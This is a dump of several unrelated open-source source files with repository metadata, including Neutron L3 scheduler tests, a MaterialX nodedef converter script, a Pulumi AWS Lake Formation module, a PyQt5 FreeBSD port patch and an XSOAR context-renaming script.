expected_host=['host_2'])),
('dvr',
dict(agent_modes=['dvr'],
host=['host_3'],
expected_agent_modes=['dvr'],
expected_host=['host_3'])),
('dvr_no_external',
dict(agent_modes=['dvr_no_external'],
host=['host_4'],
expected_agent_modes=['dvr_no_external'],
expected_host=['host_4'])),
('dvr_snat and dvr',
dict(agent_modes=['dvr_snat', 'dvr'],
host=['host_5'],
expected_agent_modes=['dvr_snat', 'dvr'],
expected_host=['host_5'])),
('dvr_snat and dvr_no_external',
dict(agent_modes=['dvr_snat', 'dvr_no_external'],
host=['host_5'],
expected_agent_modes=['dvr_snat', 'dvr_no_external'],
expected_host=['host_5'])),
('dvr_snat, dvr and dvr_no_external',
dict(agent_modes=['dvr_snat', 'dvr', 'dvr_no_external'],
host=['host_6'],
expected_agent_modes=['dvr_snat', 'dvr', 'dvr_no_external'],
expected_host=['host_6'])),
('invalid',
dict(agent_modes=['invalid'],
host=['host_invalid'],
expected_agent_modes=[],
expected_host=[])),
]
def setUp(self):
super(TestGetL3AgentsWithFilter, self).setUp()
self.plugin = L3HAPlugin()
self.setup_coreplugin('ml2')
self.adminContext = n_context.get_admin_context()
hosts = ['host_1', 'host_2', 'host_3', 'host_4', 'host_5', 'host_6']
agent_modes = ['legacy', 'dvr_snat', 'dvr', 'dvr_no_external',
'fake_mode', 'legacy']
for host, agent_mode in zip(hosts, agent_modes):
helpers.register_l3_agent(host, agent_mode)
class TestGetL3AgentsWithAgentModeFilter(TestGetL3AgentsWithFilter):
"""Test cases to test get_l3_agents 'agent_mode'.
This class tests the L3AgentSchedulerDbMixin.get_l3_agents()
for the 'agent_mode' filter with various values.
"""
def _get_agent_mode(self, agent):
agent_conf = self.plugin.get_configuration_dict(agent)
return agent_conf.get('agent_mode', 'None')
def test_get_l3_agents(self):
l3_agents = self.plugin.get_l3_agents(
self.adminContext, filters={'agent_modes': self.agent_modes})
self.assertEqual(len(self.expected_agent_modes), len(l3_agents))
returned_agent_modes = [self._get_agent_mode(agent)
for agent in l3_agents]
self.assertCountEqual(self.expected_agent_modes, returned_agent_modes)
class TestGetL3AgentsWithHostFilter(TestGetL3AgentsWithFilter):
"""Test cases to test get_l3_agents 'hosts'.
This class tests the L3AgentSchedulerDbMixin.get_l3_agents()
for the 'host' filter with various values.
"""
def _get_host(self, agent):
return agent.get('host', 'None')
def test_get_l3_agents(self):
l3_agents = self.plugin.get_l3_agents(
self.adminContext, filters={'host': self.host})
self.assertEqual(len(self.expected_host), len(l3_agents))
returned_host = [self._get_host(agent)
for agent in l3_agents]
self.assertEqual(self.expected_host, returned_host)
class L3AgentAZLeastRoutersSchedulerTestCase(L3HATestCaseMixin):
def setUp(self):
super(L3AgentAZLeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.AZLeastRoutersScheduler')
# Mock scheduling so that the test can control it explicitly
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_router_updated').start()
# Removes MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
# Extend network HA extension.
rname = network_ha.COLLECTION_NAME
attributes.RESOURCES[rname].update(
network_ha.RESOURCE_ATTRIBUTE_MAP[rname])
def _register_l3_agents(self):
self.agent1 = helpers.register_l3_agent(host='az1-host1', az='az1')
self.agent2 = helpers.register_l3_agent(host='az1-host2', az='az1')
self.agent3 = helpers.register_l3_agent(host='az2-host1', az='az2')
self.agent4 = helpers.register_l3_agent(host='az2-host2', az='az2')
self.agent5 = helpers.register_l3_agent(host='az3-host1', az='az3')
self.agent6 = helpers.register_l3_agent(host='az3-host2', az='az3')
def test_az_scheduler_auto_schedule(self):
r1 = self._create_ha_router(ha=False, az_hints=['az1'])
self.plugin.auto_schedule_routers(self.adminContext, 'az1-host2')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(1, len(agents))
self.assertEqual('az1-host2', agents[0]['host'])
def test_az_scheduler_auto_schedule_no_match(self):
r1 = self._create_ha_router(ha=False, az_hints=['az1'])
self.plugin.auto_schedule_routers(self.adminContext, 'az2-host1')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(0, len(agents))
def test_az_scheduler_default_az(self):
cfg.CONF.set_override('default_availability_zones', ['az2'])
r1 = self._create_ha_router(ha=False)
r2 = self._create_ha_router(ha=False)
r3 = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, r1['id'])
self.plugin.schedule_router(self.adminContext, r2['id'])
self.plugin.schedule_router(self.adminContext, r3['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id'], r2['id'], r3['id']])
self.assertEqual(3, len(agents))
expected_hosts = set(['az2-host1', 'az2-host2'])
hosts = set([a['host'] for a in agents])
self.assertEqual(expected_hosts, hosts)
def test_az_scheduler_az_hints(self):
r1 = self._create_ha_router(ha=False, az_hints=['az3'])
r2 = self._create_ha_router(ha=False, az_hints=['az3'])
r3 = self._create_ha_router(ha=False, az_hints=['az3'])
self.plugin.schedule_router(self.adminContext, r1['id'])
self.plugin.schedule_router(self.adminContext, r2['id'])
self.plugin.schedule_router(self.adminContext, r3['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id'], r2['id'], r3['id']])
self.assertEqual(3, len(agents))
expected_hosts = set(['az3-host1', 'az3-host2'])
hosts = set([a['host'] for a in agents])
self.assertEqual(expected_hosts, hosts)
def test_az_scheduler_least_routers(self):
r1 = self._create_ha_router(ha=False, az_hints=['az1'])
r2 = self._create_ha_router(ha=False, az_hints=['az1'])
r3 = self._create_ha_router(ha=False, az_hints=['az1'])
r4 = self._create_ha_router(ha=False, az_hints=['az1'])
self.plugin.schedule_router(self.adminContext, r1['id'])
self.plugin.schedule_router(self.adminContext, r2['id'])
self.plugin.schedule_router(self.adminContext, r3['id'])
self.plugin.schedule_router(self.adminContext, r4['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id'], r2['id'], r3['id'], r4['id']])
host_num = collections.defaultdict(int)
for agent in agents:
host_num[agent['host']] += 1
self.assertEqual(2, host_num['az1-host1'])
self.assertEqual(2, host_num['az1-host2'])
def test_az_scheduler_ha_az_hints(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
r1 = self._create_ha_router(az_hints=['az1', 'az3'])
self.plugin.schedule_router(self.adminContext, r1['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(2, len(agents))
expected_azs = set(['az1', 'az3'])
azs = set([a['availability_zone'] for a in agents])
self.assertEqual(expected_azs, azs)
def test_az_scheduler_ha_auto_schedule(self):
cfg.CONF.set_override('max_l3_agents_per_router', 3)
self._set_l3_agent_admin_state(self.adminContext, self.agent2['id'],
state=False)
self._set_l3_agent_admin_state(self.adminContext, self.agent6['id'],
state=False)
r1 = self._create_ha_router(az_hints=['az1', 'az3'])
self.plugin.schedule_router(self.adminContext, r1['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(2, len(agents))
hosts = set([a['host'] for a in agents])
self.assertEqual(set(['az1-host1', 'az3-host1']), hosts)
self._set_l3_agent_admin_state(self.adminContext, self.agent6['id'],
state=True)
self.plugin.auto_schedule_routers(self.adminContext, 'az3-host2')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(3, len(agents))
expected_hosts = set(['az1-host1', 'az3-host1', 'az3-host2'])
hosts = set([a['host'] for a in agents])
self.assertEqual(expected_hosts, hosts)
def test__get_routers_can_schedule_with_no_target_routers(self):
result = self.plugin.router_scheduler._get_routers_can_schedule(
self.plugin, mock.ANY, [], mock.ANY)
self.assertEqual([], result)
class L3DVRHAPlugin(db_v2.NeutronDbPluginV2,
l3_hamode_db.L3_HA_NAT_db_mixin,
l3_dvr_ha_scheduler_db.L3_DVR_HA_scheduler_db_mixin):
pass
class L3DVRHATestCaseMixin(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
def setUp(self):
super(L3DVRHATestCaseMixin, self).setUp()
self.adminContext = n_context.get_admin_context()
self.plugin = L3DVRHAPlugin()
|
1ed39b707fdf117366e1b24952dc57ab864f3f3f
|
3eb3c4046b17e265930aaf89fa93f41896f243cb
|
/spynnaker8/spynnaker_plotting.py
|
f7fcd0b8b7a86cd9502ebf7dded0e35d88a3526b
|
[
"Apache-2.0"
] |
permissive
|
SpiNNakerManchester/sPyNNaker
|
b177613a114cfc7e7687ec36c1f72a2f07f66977
|
891cfb3046f66185fd8df52d270380fa94c32eab
|
refs/heads/master
| 2023-09-01T11:28:21.252266
| 2023-08-17T08:07:43
| 2023-08-17T08:07:43
| 20,801,613
| 101
| 53
|
Apache-2.0
| 2023-09-14T18:39:29
| 2014-06-13T11:07:19
|
Python
|
UTF-8
|
Python
| false
| false
| 4,167
|
py
|
spynnaker_plotting.py
|
# Copyright (c) 2021 The University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import spynnaker.spynnaker_plotting as new_plotting
from spynnaker.spynnaker_plotting import SpynnakerPanel as _BaseClass
from spynnaker.pyNN.utilities.utility_calls import moved_in_v6
def plot_spiketrains(axes, spiketrains, label='', **options):
"""
Plot all spike trains in a Segment in a raster plot.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param list(~neo.core.SpikeTrain) spiketrains: List of spike times
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.plot_spiketrains(axes, spiketrains, label, **options)
def plot_spikes_numpy(axes, spikes, label='', **options):
"""
Plot all spikes.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~numpy.ndarray spikes: spynakker7 format numpy array of spikes
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.plot_spikes_numpy(axes, spikes, label, **options)
def heat_plot_numpy(axes, data, label='', **options):
"""
Plots neurons, times and values into a heatmap.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~numpy.ndarray data: numpy array of values in spynnaker7 format
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.heat_plot_numpy(axes, data, label, **options)
def heat_plot_neo(axes, signal_array, label='', **options):
"""
Plots neurons, times and values into a heatmap.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~neo.core.AnalogSignal signal_array: Neo Signal array Object
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.heat_plot_neo(axes, signal_array, label, **options)
def plot_segment(axes, segment, label='', **options):
"""
Plots a segment into a plot of spikes or a heatmap.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~neo.core.Segment segment: Data for one run to plot
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.plot_segment(axes, segment, label, **options)
class SpynnakerPanel(_BaseClass):
"""
Represents a single panel in a multi-panel figure.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
"""
def __init__(self, *data, **options):
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
super(SpynnakerPanel, self).__init__(*data, **options)
|
0bdd5893618fe96521235205e4411f76a5594bdb
|
098bdd84c5c13c1c750bd66848d3cc394a2f4da3
|
/contrib/adsk/MaterialX/Utilities/Scripts/mxnodedefconvert.py
|
32b08da4b9e85ff80341a2022462f639dd4475b4
|
[
"Apache-2.0"
] |
permissive
|
autodesk-forks/MaterialX
|
0526c4cdd36cc4d0f0e1773b6833da2f28f53b84
|
f6fdb68d9929fa26458161718c6b26dd69f246de
|
refs/heads/adsk_contrib/dev
| 2023-08-17T03:00:13.163418
| 2023-07-24T17:35:14
| 2023-07-24T17:35:14
| 99,679,762
| 110
| 25
|
Apache-2.0
| 2023-09-13T05:14:38
| 2017-08-08T10:16:05
|
Mathematica
|
UTF-8
|
Python
| false
| false
| 10,807
|
py
|
mxnodedefconvert.py
|
#!/usr/bin/env python
"""
Utility to generate json and hpp from MaterialX nodedef
Given a node def e.g. ND_standard_surface_surfaceshader will
generate a standard_surface.json and standard_surface.hpp
The hpp/json can be used for simple reflection instead
of parsing mtlx libraries
"""
import sys
import os
import argparse
import json
import hashlib
import MaterialX as mx
INPUTFILEHASH = 0
mx_stdTypes = {
'color3': ['MaterialX::Color3', mx.Color3(1, 1, 1)],
'color4': ['MaterialX::Color4', mx.Color4(1, 1, 1, 1)],
'vector4': ['MaterialX::Vector4', mx.Vector4(1, 1, 1, 1)],
'vector3': ['MaterialX::Vector3', mx.Vector3(1, 1, 1)],
'vector2': ['MaterialX::Vector2', mx.Vector2(1, 1)],
'matrix33': ['MaterialX::Matrix33', None],
'matrix44': ['MaterialX::Matrix44', None],
'integerarray': ['std::vector<int>', None],
'floatarray': ['std::vector<float>', None],
'color3array': ['std::vector<MaterialX::Color3>', None],
'color4array': ['std::vector<MaterialX::Color4>', None],
'vector2array': ['std::vector<MaterialX::Vector2>', None],
'vector3array': ['std::vector<MaterialX::Vector3>', None],
'vector4array': ['std::vector<MaterialX::Vector4>', None],
'stringarray': ['std::vector<std::string>', None],
'boolean': ['bool', False],
'integer': ['int', 0],
'file': ['std::string', ""],
'filename': ['std::string', ""],
'string': ['std::string', ""],
'float': ['float', 0],
#TODO: create custom structs (fixme)
'lightshader': ['lightshader', None],
'volumeshader': ['volumeshader', None],
'displacementshader': ['displacementshader', None],
'surfaceshader': ['surfaceshader', None],
'BSDF': ['BSDF', None],
'EDF': ['EDF', None],
'VDF': ['VDF', None],
}
def _getType(mxType):
return mx_stdTypes[mxType][0]
def _getDefault(mxType):
return mx_stdTypes[mxType][1]
# Compute gitHash
def _computeGitHash(mtlxfile):
with open(mtlxfile, 'r') as afile:
buf = afile.read().encode()
hasher = hashlib.sha1()
hasher.update(b"blob %u\0" % len(buf))
hasher.update(buf)
return hasher.hexdigest()
def main():
parser = argparse.ArgumentParser(
description="MaterialX nodedef to json/hpp converter.")
parser.add_argument(dest="inputFilename",
help="Filename of the input document.")
parser.add_argument("--node", dest="nodedef", type=str,
help="Node to export")
parser.add_argument("--stdlib", dest="stdlib", action="store_true",
help="Import standard MaterialX libraries into the document.")
opts = parser.parse_args()
doc = mx.createDocument()
try:
mx.readFromXmlFile(doc, opts.inputFilename)
# Git hash for tracking source document
global INPUTFILEHASH
INPUTFILEHASH = _computeGitHash(opts.inputFilename)
except mx.ExceptionFileMissing as err:
print(err)
sys.exit(0)
if opts.stdlib:
stdlib = mx.createDocument()
filePath = os.path.dirname(os.path.abspath(__file__))
searchPath = mx.FileSearchPath(os.path.join(filePath, '..', '..'))
searchPath.append(os.path.dirname(opts.inputFilename))
libraryFolders = ["libraries"]
mx.loadLibraries(libraryFolders, searchPath, stdlib)
doc.importLibrary(stdlib)
(valid, message) = doc.validate()
if valid:
print("%s is a valid MaterialX document in v%s" %
(opts.inputFilename, mx.getVersionString()))
else:
print("%s is not a valid MaterialX document in v%s" %
(opts.inputFilename, mx.getVersionString()))
print(message)
nodedefs = doc.getNodeDefs()
nodedef = findNodeDef(nodedefs, opts.nodedef)
print("Document Version: {}.{:02d}".format(*doc.getVersionIntegers()))
if nodedef is None:
print("Nodedef %s not found" % (opts.nodedef))
else:
try:
exportNodeDef(nodedef)
print("%d NodeDef%s found.\nNode '%s' exported to %s(.json/.hpp)"
% (len(nodedefs), pl(nodedefs), opts.nodedef, nodedef.getNodeString()))
except Exception as e:
print(e)
sys.exit(0)
def findNodeDef(elemlist, nodedefname):
if len(elemlist) == 0:
return None
for elem in elemlist:
if elem.isA(mx.NodeDef) and elem.getName() == nodedefname:
return elem
return None
def exportNodeDef(elem):
if elem.isA(mx.NodeDef):
jsonfilename = elem.getNodeString()+'.json'
hppfilename = elem.getNodeString()+'.hpp'
export_json(elem, jsonfilename)
export_hpp(elem, hppfilename)
def export_json(elem, filename):
nodefInterface = {}
nodefInterface["Nodedef"] = elem.getName()
nodefInterface["SHA1"] = INPUTFILEHASH
nodefInterface["MaterialX"] = mx.getVersionString()
nodefInterface["name"] = elem.getNodeString()
asJsonArray(nodefInterface, elem)
with open(filename, 'w', encoding='utf-8') as f:
json.dump(nodefInterface, f, indent=4)
def asJsonArray(nodefInterface, nodedef):
inputs = []
outputs = []
for inp in nodedef.getActiveInputs():
inputs.append((_getType(inp.getType()),
inp.getName(),
str(inp.getValue())))
nodefInterface["inputs"] = inputs
for output in nodedef.getActiveOutputs():
outputs.append((_getType(output.getType()),
output.getName(),
str(output.getValue())))
nodefInterface["outputs"] = outputs
def export_hpp(elem, filename):
# write to file
preamble = "/*\nGenerated using MaterialX nodedef \
\n{nodename}\nSHA1:{filehash}\nVersion:{version}\n*/\n"\
.format(nodename=elem, filehash=INPUTFILEHASH, version=mx.getVersionString())
variable_defs = ""
for inp in elem.getActiveInputs():
#create decl
decl = getVarDeclaration(inp)
#emit variable decl
if decl is None:
variable_def = ' {typename} {name};\n' \
.format(typename=_getType(inp.getType()),
name=inp.getName())
else:
variable_def = ' {typename} {name} = {declaration};\n' \
.format(typename=_getType(inp.getType()),
name=inp.getName(),
declaration=decl)
variable_defs += variable_def
for output in elem.getActiveOutputs():
#create decl
decl = getVarDeclaration(output)
#emit output
if decl is None:
variable_def = ' {typename}* {name};\n' \
.format(typename=_getType(output.getType()),
name=output.getName())
else:
variable_def = ' {typename} {name} = {declaration};\n' \
.format(typename=_getType(output.getType()),
name=output.getName(),
declaration=decl)
variable_defs += variable_def
nodename_definition = ' std::string _nodename_ = "{nodename}";\n'.format(
nodename=elem.getNodeString())
# create struct definition
struct_definition = """struct {structname} {{\n{variabledefs}{nodeiddef}}};""" \
.format(structname=elem.getName(),
variabledefs=variable_defs,
nodeiddef=nodename_definition)
with open(filename, 'w', encoding='utf-8') as f:
f.write(preamble)
f.write(struct_definition)
f.close()
def getVarDeclaration(inputVar):
inputValue = inputVar.getValue()
typeName = _getType(inputVar.getType())
if isinstance(inputValue, (mx.Color3, mx.Vector3)):
val = '{typename}({v0}f, {v1}f, {v2}f)'.format(typename=typeName,
v0=round(
inputValue[0], 5),
v1=round(
inputValue[1], 5),
v2=round(inputValue[2], 5))
return val
if isinstance(inputValue, (mx.Color4, mx.Vector4)):
val = '{typename}({v0}f, {v1}f, {v2}f, {v3}f)'.format(typename=typeName,
v0=round(
inputValue[0], 5),
v1=round(
inputValue[1], 5),
v2=round(
inputValue[2], 5),
v3=round(inputValue[3], 5))
return val
if isinstance(inputValue, float):
val = '{0}f'.format(round(inputValue, 5))
return val
if isinstance(inputValue, bool):
val = '{0}'.format('true' if inputValue is True else 'false')
return val
if isinstance(inputValue, int):
val = '{0}'.format(inputValue)
return val
# use input type if value is not defined and set default
defaultValue = _getDefault(inputVar.getType())
if inputValue is None:
if inputVar.getType() in ['vector2']:
val = '{typename}({v0}f, {v1}f)'.format(typename=typeName,
v0=defaultValue[0],
v1=defaultValue[1])
return val
if inputVar.getType() in ['vector3', 'color3']:
val = '{typename}({v0}f, {v1}f, {v2}f)'.format(typename=typeName,
v0=defaultValue[0],
v1=defaultValue[1],
v2=defaultValue[2])
return val
if inputVar.getType() in ['vector4', 'color4']:
val = '{typename}({v0}f, {v1}f, {v2}f, {v3}f)'.format(typename=typeName,
v0=defaultValue[0],
v1=defaultValue[1],
v2=defaultValue[2],
v3=defaultValue[3])
return val
else:
print("unhandled: " + typeName)
return None
def pl(elem):
if len(elem) == 1:
return ""
else:
return "s"
if __name__ == '__main__':
main()
|
7a544dfa7b3f33b3d9b3ea1a0744b5efa12f70b2
|
9907672fcd81ab73ac63b2a83422a82bf31eadde
|
/tyama_icpc2015dpA.py
|
73ca29381e2a7a385c189d7f7d5abdd4b1c5d955
|
[
"0BSD"
] |
permissive
|
cielavenir/procon
|
bbe1974b9bddb51b76d58722a0686a5b477c4456
|
746e1a91f574f20647e8aaaac0d9e6173f741176
|
refs/heads/master
| 2023-06-21T23:11:24.562546
| 2023-06-11T13:15:15
| 2023-06-11T13:15:15
| 7,557,464
| 137
| 136
| null | 2020-10-20T09:35:52
| 2013-01-11T09:40:26
|
C++
|
UTF-8
|
Python
| false
| false
| 209
|
py
|
tyama_icpc2015dpA.py
|
#!/usr/bin/python
import sys,math
if sys.version_info[0]>=3: raw_input=input
while True:
a,b=[int(e) for e in raw_input().split()]
if not a: break
print(min(abs(b-math.hypot(i,a-i)) for i in range(a//2+1)))
|
94c2007d1c7ca21e26b89536633db4a0b70cb837
|
e65a4dbfbfb0e54e59787ba7741efee12f7687f3
|
/x11-toolkits/py-qt5-chart/files/patch-configure.py
|
01781a2e74801a97c48f368e28bd4bd97c08a885
|
[
"BSD-2-Clause"
] |
permissive
|
freebsd/freebsd-ports
|
86f2e89d43913412c4f6b2be3e255bc0945eac12
|
605a2983f245ac63f5420e023e7dce56898ad801
|
refs/heads/main
| 2023-08-30T21:46:28.720924
| 2023-08-30T19:33:44
| 2023-08-30T19:33:44
| 1,803,961
| 916
| 918
|
NOASSERTION
| 2023-09-08T04:06:26
| 2011-05-26T11:15:35
| null |
UTF-8
|
Python
| false
| false
| 829
|
py
|
patch-configure.py
|
--- configure.py.orig 2021-10-26 11:10:38 UTC
+++ configure.py
@@ -1549,10 +1549,10 @@ INSTALLS += sip
# These optimisations could apply to other platforms.
if module_config.no_exceptions:
- if target_config.py_platform.startswith('linux') or target_config.py_platform == 'darwin':
+ if target_config.py_platform.startswith('linux') or target_config.py_platform.startswith('freebsd') or target_config.py_platform == 'darwin':
pro.write('QMAKE_CXXFLAGS += -fno-exceptions\n')
- if target_config.py_platform.startswith('linux') and not opts.static:
+ if target_config.py_platform.startswith('linux') or target_config.py_platform.startswith('freebsd') and not opts.static:
if target_config.py_version >= 0x030000:
entry_point = 'PyInit_%s' % mname
else:
|
a97c4a9cae429eb0c4374d84b26c2a6f9cbfff23
|
1742b6719b988e5519373002305e31d28b8bd691
|
/sdk/python/pulumi_aws/lakeformation/get_resource.py
|
2f4789fb310701d2be86d399ebc5c0af7c9dd677
|
[
"BSD-3-Clause",
"MPL-2.0",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-aws
|
4f7fdb4a816c5ea357cff2c2e3b613c006e49f1a
|
42b0a0abdf6c14da248da22f8c4530af06e67b98
|
refs/heads/master
| 2023-08-03T23:08:34.520280
| 2023-08-01T18:09:58
| 2023-08-01T18:09:58
| 97,484,940
| 384
| 171
|
Apache-2.0
| 2023-09-14T14:48:40
| 2017-07-17T14:20:33
|
Java
|
UTF-8
|
Python
| false
| false
| 3,931
|
py
|
get_resource.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetResourceResult',
'AwaitableGetResourceResult',
'get_resource',
'get_resource_output',
]
@pulumi.output_type
class GetResourceResult:
"""
A collection of values returned by getResource.
"""
def __init__(__self__, arn=None, id=None, last_modified=None, role_arn=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if last_modified and not isinstance(last_modified, str):
raise TypeError("Expected argument 'last_modified' to be a str")
pulumi.set(__self__, "last_modified", last_modified)
if role_arn and not isinstance(role_arn, str):
raise TypeError("Expected argument 'role_arn' to be a str")
pulumi.set(__self__, "role_arn", role_arn)
@property
@pulumi.getter
def arn(self) -> str:
return pulumi.get(self, "arn")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lastModified")
def last_modified(self) -> str:
"""
Date and time the resource was last modified in [RFC 3339 format](https://tools.ietf.org/html/rfc3339#section-5.8).
"""
return pulumi.get(self, "last_modified")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> str:
"""
Role that the resource was registered with.
"""
return pulumi.get(self, "role_arn")
class AwaitableGetResourceResult(GetResourceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetResourceResult(
arn=self.arn,
id=self.id,
last_modified=self.last_modified,
role_arn=self.role_arn)
def get_resource(arn: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetResourceResult:
"""
Provides details about a Lake Formation resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.lakeformation.get_resource(arn="arn:aws:s3:::tf-acc-test-9151654063908211878")
```
:param str arn: ARN of the resource, an S3 path.
"""
__args__ = dict()
__args__['arn'] = arn
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('aws:lakeformation/getResource:getResource', __args__, opts=opts, typ=GetResourceResult).value
return AwaitableGetResourceResult(
arn=pulumi.get(__ret__, 'arn'),
id=pulumi.get(__ret__, 'id'),
last_modified=pulumi.get(__ret__, 'last_modified'),
role_arn=pulumi.get(__ret__, 'role_arn'))
@_utilities.lift_output_func(get_resource)
def get_resource_output(arn: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetResourceResult]:
"""
Provides details about a Lake Formation resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.lakeformation.get_resource(arn="arn:aws:s3:::tf-acc-test-9151654063908211878")
```
:param str arn: ARN of the resource, an S3 path.
"""
...
|
38eef92bb1e4300d1771d0e3e0cbc289267e2495
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/CommonScripts/Scripts/ChangeContext/ChangeContext.py
|
3fe0bb9e2abe55e20cf80ed7086a2f115c7ed2c8
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 1,281
|
py
|
ChangeContext.py
|
from CommonServerPython import *
import json
def replace_context(args: dict) -> tuple:
context = args.get('input', '')
output_key = args.get('output_key', '')
inplace = args.get('inplace', 'True') == 'True'
capitalize = args.get('capitalize') == 'True'
replace_dict = json.loads(args.get('replace_dict', "{}"))
if not context:
return "The context key you've entered is empty. Nothing has happened.", {}, {}
if not isinstance(context, (list, dict)):
return "The context key you've entered is at the lowest level and cannot be changed.", {}, {}
def replace_func(key):
if key in replace_dict.keys():
return replace_dict.get(key)
else:
if capitalize:
return key.title()
return key
new_context = createContext(context, keyTransform=replace_func)
if inplace:
demisto.executeCommand("Set", {'key': output_key, 'value': new_context})
return f"Changed {output_key} successfully", {}, {}
else:
return f"Appended {output_key} successfully", {output_key: new_context}, {}
def main():
hr, ec, raw = replace_context(demisto.args())
return_outputs(hr, ec, raw)
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
|
7ddde8adc11cdac5a6c68113f1df0998dae56b94
|
2dd26e031162e75f37ecb1f7dd7f675eeb634c63
|
/nemo/collections/nlp/data/text_normalization_as_tagging/thutmose_tagger_dataset.py
|
c8df33885622798bce3c25e4204b9b9a0625bc73
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/NeMo
|
1b001fa2ae5d14defbfd02f3fe750c5a09e89dd1
|
c20a16ea8aa2a9d8e31a98eb22178ddb9d5935e7
|
refs/heads/main
| 2023-08-21T15:28:04.447838
| 2023-08-21T00:49:36
| 2023-08-21T00:49:36
| 200,722,670
| 7,957
| 1,986
|
Apache-2.0
| 2023-09-14T18:49:54
| 2019-08-05T20:16:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,122
|
py
|
thutmose_tagger_dataset.py
|
# Copyright (c) 2022, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict, List, Optional
import numpy as np
